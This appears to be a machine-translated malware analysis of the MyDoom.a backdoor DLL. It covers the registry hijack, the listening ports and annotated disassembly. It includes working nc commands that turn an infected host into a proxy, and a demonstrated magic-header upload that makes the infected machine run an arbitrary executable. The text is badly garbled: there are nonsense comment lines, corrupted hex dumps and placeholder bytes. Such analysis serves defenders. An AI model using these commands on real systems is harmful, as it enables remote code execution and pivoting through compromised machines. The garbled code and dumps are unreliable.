Tombkeeper # Whitecell.org
The back door of MyDoom.a is existing in the form of a DLL, and loads themselves into the process space of the resource manager by modifying the registry corresponding key value.
Under normal circumstances, the registry should look like this:
HKEY_CLASSES_ROOT / CLSID / {E6FB5E20-DE35-11CF-9C87-00AA005127ED} / InprocServer32
ThreadingModel Reg_sz Apartment
MYDOOM.A replaces the% SystemRoot% / System32 / WebCheck.dll of the location into its own Shimgapi.dll.
By default, the Shimgapi.dll rear door surveys 3127 ports, if the port is occupied, increase, but not more than 3198.
This latte provides two functions:
1, as a port forwarding agent
2. As the back door, the receiving program uploads and executes
Related code:
.TEXT: 7E1A1C44 SUB_7E1A1C44 Proc Near; Data XREF: Start 19o
.Text: 7e1a1c44
.TEXT: 7E1A1C44 WSADATA = WSADATA PTR-190H
.Text: 7e1a1c44
.TEXT: 7E1A1C44 SUB ESP, 190H
.Text: 7e1a1c4a push ESI
.Text: 7e1a1c4b push edi
.TEXT: 7E1A1C4C CALL SUB_7E1A1A1F
.Text: 7e1a1c51 Lea Eax, [ESP 198H WSADATA]
.Text: 7e1a1c55 push eax; lpwsadata
.Text: 7e1a1c56 push 2; WVersionRequested
.Text: 7e1a1c58 Call DS: WSAStartup
.Text: 7e1a1c5e Call Address
.Text: 7e1a1c63 MOV EDI, DS: SLEEP
.TEXT: 7E1A1C69 MOV ESI, 0C37H; Monitor 3127 Port
.Text: 7e1a1c6e
.TEXT: 7E1A1C6E LOC_7E1A1C6E:; Code XREF: SUB_7E1A1C44 50J
.Text: 7e1a1c6e push 3
.Text: 7e1a1c70 Push ESI
.TEXT: 7E1A1C71 CALL SUB_7E1A1B52; BIND subroutine
.TEXT: 7E1A1C76 POP ECX
.Text: 7e1a1c77 pop ECX
.Text: 7e1a1c78 push 400h; dwmilliseconds.text: 7e1a1c7d call Edi; SLEEP
.Text: 7e1a1c7f CMP ESI, 0C7EH; port is not greater than 3198
.Text: 7e1a1c85 Jle Short Loc_7e1a1c93
.TEXT: 7E1A1C87 Push 800h; dwmilliseconds
.Text: 7e1a1c8c Call Edi; SLEEP
.Text: 7e1a1c8e Mov ESI, 0C37H
.text: 7e1a1c93
.TEXT: 7E1A1C93 LOC_7E1A1C93:; Code XREF: SUB_7E1A1C44 41J
.Text: 7e1a1c93 Inc ESI; re-bind if the port is greater than 3198
.TEXT: 7E1A1C94 JMP Short Loc_7e1a1c6e
.TEXT: 7E1A1C94 SUB_7E1A1C44 ENDP
When the 3127 port receives the connection, if the first character of the RECV is / x04, the transfer port forwarding process -> determine if the second character is 0x01 -> Take the 5th to 8th character as the target IP address -> Take 3, 4 characters as target ports -> Connect and current Socket data forwarding
For example, we use / x00 / x6e / xc0 / xa8 / x01 / x0b as a connection instruction, where / x00 / x6e is 110 port, / XC0 / XA8 / X01 / X0B is 192.168.1.11.
#printf / x04 / x01 / x00 / x6e / xc0 / xa8 / x01 / x0b / x00 | NC 192.168.7.33 3127
Z Includes OK Microsoft Exchange Server 2003 POP3 Server Version 6.5.6944.0 Ready.
It can be seen that the session of the 110 port sent to 192.168.1.11 is turned back. Note that a data is also included in front of the returned character. Test again:
#printf / x04 / x01 / x00 / x6e / xc0 / xa8 / x01 / x0b / x00 | NC 192.168.7.33 3127 | XXD -G 1
0000000: 04 5A 00 6e C0 A8 01 0B 2B 4F 4B 20 4D 69 63 72.z.n .... OK Micr
0000010: 6F 73 6F 66 74 20 45 78 63 68 61 6e 67 65 20 53 Osoft Exchange S
0000020: 65 72 76 65 72 20 32 30 30 33 20 50 4F 50 33 20 ERVER 2003 POP3
0000030: 73 65 72 76 65 72 20 76 65 72 73 69 6F 6E 20 36 Server Version 6
0000040: 2E 35 2E 36 39 34 34 2E 30 20 28 64 63 2e 69 6e. 5.6944.0
Try sending a 98-port that does not exist in an instruction connection:
#printf / x04 / x01 / x00 / x62 / xc0 / xa8 / x01 / x0b / x00 | NC 192.168.7.33 3127 | XXD -G 10000000: 04 5B 00 62 C0 A8 01 0B. [. B ....
Obviously, the data represents the connection state. 04 5A shows that the connection is successful, and 04 5b represents the connection failure. The later is the transmitted connection instruction. This feature may be designed for worms to determine their clients.
Related code:
.TEXT: 7E1A17F5
.TEXT: 7E1A17F5 LOC_7E1A17F5:; Code XREF: SUB_7E1A17BA 2BJ
.TEXT: 7E1A17F5 CMP BYTE PTR [EBP-1], 4; Compare the first character is 0x04
.text: 7e1a17f9 push ebx
.TEXT: 7E1A17FA JNZ LOC_7E1A18B7; The first character is not 0x04 turn to exit
.Text: 7e1a1800 xor EBX, EBX
.Text: 7e1a1802
.TEXT: 7E1A1802 LOC_7E1A1802:; Code Xref: SUB_7E1A17BA 65J
.Text: 7e1a1802 push 0; Flags
.Text: 7e1a1804 push 8
.Text: 7e1a1806 pop eax
.Text: 7e1a1807 Sub EAX, EBX
.Text: 7e1a1809 push eax; len
.text: 7e1a180a lea eax, [EBP EBX BUF]
.Text: 7e1a180e push eax; buf
.TEXT: 7E1A180F Push [EBP S]; S
.TEXT: 7E1A1812 Call ESI; Recv
.Text: 7e1a1814 Test Eax, EAX
.TEXT: 7E1A1816 JL Short Loc_7e1a1823
.TEXT: 7E1A1818 JZ Short Loc_7e1a1825
.Text: 7e1a181a add ebx, EAX
.Text: 7e1a181c CMP EBX, 8; More receiving characters are not 8
.TEXT: 7E1A181F JL Short Loc_7e1a1802; Continue to RECV
.TEXT: 7E1A1821 JMP Short Loc_7e1a1825
.text: 7e1a1823;? Where is Xomomo? Where is Xomiyo? Where is Xomiyomo? Where is Xomo?
.TEXT: 7E1A1823
.Text: 7e1a1823 Loc_7e1a1823:; code Xref: Sub_7e1a17ba 5cj.text: 7e1a1823 MOV EBX, EAX
.TEXT: 7E1A1825
.TEXT: 7E1A1825 LOC_7E1A1825:; Code Xref: SUB_7E1A17BA 5EJ
.TEXT: 7E1A1825; SUB_7E1A17BA 67J
.TEXT: 7E1A1825 CMP EBX, 8
.TEXT: 7E1A1828 JNZ LOC_7E1A1907
.TEXT: 7E1A182E JMP Short Loc_7e1a1836
.TEXT: 7E1A1830 ;. Where is Xomotice? Where is Xomiyo? Where is Xomomo? Where is Xomo? Where is Xomiyo?
.text: 7e1a1830
.Text: 7e1a1830 Loc_7e1a1830:; code Xref: Sub_7e1a17ba 8cj
.TEXT: 7E1A1830 CMP [EBP VAR_2], 0; compares whether the characters after 8 characters are 0x00, that is, if they only send 8 characters
.TEXT: 7E1A1834 JZ Short Loc_7e1A184A
.text: 7e1a1836
.Text: 7e1a1836 Loc_7e1a1836:; code Xref: SUB_7E1A17BA 74J
.Text: 7e1a1836 push 0
.Text: 7e1a1838 Lea Eax, [EBP VAR_2]
.TEXT: 7E1A183B PUSH 1
.Text: 7e1a183d Push EAX
.text: 7e1a183e push [EBP S]
.text: 7e1a1841 Call ESI
.TEXT: 7E1A1843 CMP EAX, 1
.TEXT: 7E1A1846 JZ Short Loc_7e1a1830
.TEXT: 7E1A1848 JMP Short Loc_7e1a18b7
.text: 7e1a184a;? Where is Xomomo? Where is Xomomo? Where is Xomiyo?
.TEXT: 7E1A184A
.TEXT: 7E1A184A LOC_7E1A184A:; CODE XREF: SUB_7E1A17BA 7AJ
.TEXT: 7E1A184A CMP [EBP BUF], 4; again determined if the first character is 0x04
.TEXT: 7E1A184E JNZ Short Loc_7e1a18b7
.TEXT: 7E1A1850 CMP BYTE PTR [EBP-0FH], 1; Determine if the second character is 0x01, if yes, continue, not, exit .Text: 7e1a1854 jnz Short Loc_7e1a18b7
.TEXT: 7E1A1856 CMP [EBP HOSTLONG], 0; Judging the last four characters (IP)
.TEXT: 7E1A185A JZ SHORT LOC_7E1A187C
.Text: 7e1a185c push [ebp hostlong]; Hostlong
.Text: 7e1a185f call ds: htonl
.Text: 7e1a1865 Test Eax, 0FFFFFFFFFFFFFFFFF00h; Check that the input IP is 255.255.255.0
.TEXT: 7E1A186A JNZ Short Loc_7e1a187c
.TEXT: 7E1A186C PUSH [EBP S]
.Text: 7e1a186f lea EBX, [EBP HOSTLONG]
.TEXT: 7E1A1872 CALL SUB_7E1A1664
.Text: 7e1a1877 Test Eax, EAX
.TEXT: 7E1A1879 POP ECX
.TEXT: 7E1A187A JNZ SHORT LOC_7E1A18B7
.TEXT: 7E1A187C
.Text: 7e1a187c Loc_7e1a187c:; code Xref: SUB_7E1A17BA A0J
.TEXT: 7E1A187C; SUB_7E1A17BA B0J
.TEXT: 7E1A187C MOV AX, [EBP-0EH]; Take the first two characters, as port
.Text: 7e1a1880 push 6; Protocol
.TEXT: 7E1A1882 MOV Word PTR [EBP NAME.SA_DATA], AX
.Text: 7e1a1886 MOV EAX, [EBP HOSTLONG]
.TEXT: 7E1A1889 Push 1; Type
.TEXT: 7E1A188B PUSH 2; AF
.TEXT: 7E1A188D MOV [EBP NAME.SA_FAMILY], 2
.TEXT: 7E1A1893 MOV DWORD PTR [EBP NAME.SA_DATA 2], EAX
.text: 7e1a1896 call ds: socket
.Text: 7e1a189c cmp Eax, 0FFFFFFFH
.TEXT: 7E1A189F MOV [EBP VAR_8], EAX
.TEXT: 7E1A18A2 JZ SHORT LOC_7E1A18B7
.Text: 7e1a18a4 Lea Eax, [EBP NAME]
.Text: 7e1a18a7 push 10h; Namelen
.TEXT: 7E1A18A9 PUSH EAX; Name
.TEXT: 7E1A18AA PUSH [EBP VAR_8]; S
.Text: 7e1a18ad call DS: Connect
.Text: 7e1a18b3 Test Eax, EAX
.TEXT: 7E1A18B5 JZ SHORT LOC_7E1A18D2
.Text: 7e1a18b7
.TEXT: 7E1A18B7 LOC_7E1A18B7:; Code XREF: SUB_7E1A17BA 40J
.Text: 7e1A18b7; SUB_7E1A17BA 8EJ ...
.TEXT: 7E1A18B7 PUSH 0; FLAGS
.Text: 7e1a18b9 Lea Eax, [EBP BUF]
.TEXT: 7E1A18BC PUSH 8; LEN
.Text: 7e1a18be push eax; buf
.TEXT: 7E1A18BF PUSH [EBP S]; S
.TEXT: 7E1A18C2 MOV [EBP BUF], 4
.TEXT: 7E1A18C6 MOV BYTE PTR [EBP-0FH], 5BH; Connection is unsuccessful, return 0x5b
.Text: 7e1a18ca call ds: Send
.TEXT: 7E1A18D0 JMP Short Loc_7e1A18F8
.TEXT: 7E1A18D2;? Where is Xomotice? Where is Xomiyo? Where is Xomo? Where is Xomiyo?
.TEXT: 7E1A18D2
.TEXT: 7E1A18D2 LOC_7E1A18D2:; Code Xref: SUB_7E1A17BA FBJ
.TEXT: 7E1A18D2 PUSH 0; FLAGS
.Text: 7e1a18d4 Lea EAX, [EBP BUF]
.TEXT: 7E1A18D7 PUSH 8; LEN
.Text: 7e1a18d9 push eax; buf
.Text: 7e1a18da push [EBP S]; S.Text: 7e1a18dd MOV [EBP BUF], 4
.TEXT: 7E1A18E1 MOV BYTE PTR [EBP-0FH], 5ah; connection success, return 0x5a
.TEXT: 7E1A18E5 Call DS: Send
.TEXT: 7E1A18EB PUSH [EBP VAR_8]
.TEXT: 7E1A18EE PUSH [EBP S]
.TEXT: 7E1A18F1 CALL SUB_7E1A16D3
.Text: 7e1a18f6 pop ECX
.Text: 7e1a18f7 pop ECX
If the first character of Recv is / xqq -> 2nd to 5 characters is / xpp / xpp / xpp / xpp -> Accept all data starting from the sixth character, saved as file in temporary folder - -> CREATEPROCESS -> After the program exits, delete the program.
That is, as long as we put any one of the executable heads, add five characters: / XQQ / XPP / XPP / XPP / XPP, as data is sent to 3127 port infected with myDoom.a worm machine, this file It will be executed on the system. I put the system's calculator program with UltraEdit plus this Magic-HEAD, transmitted with NC, successfully executed.
# xxd -g 1 -l 64 Calc.exe
0000000: QQ PP PP PP PP 4D 5A 90 00 03 00 00 00 00 00 .. <.. mz .........
0000010: 00 FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00- ...........
0000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00- ..............
0000030: 0,000,000,000,000,000 0,000,000,000,000,000 ................
# nc 192.168.7.33 3127 ^ C Related code: slightly
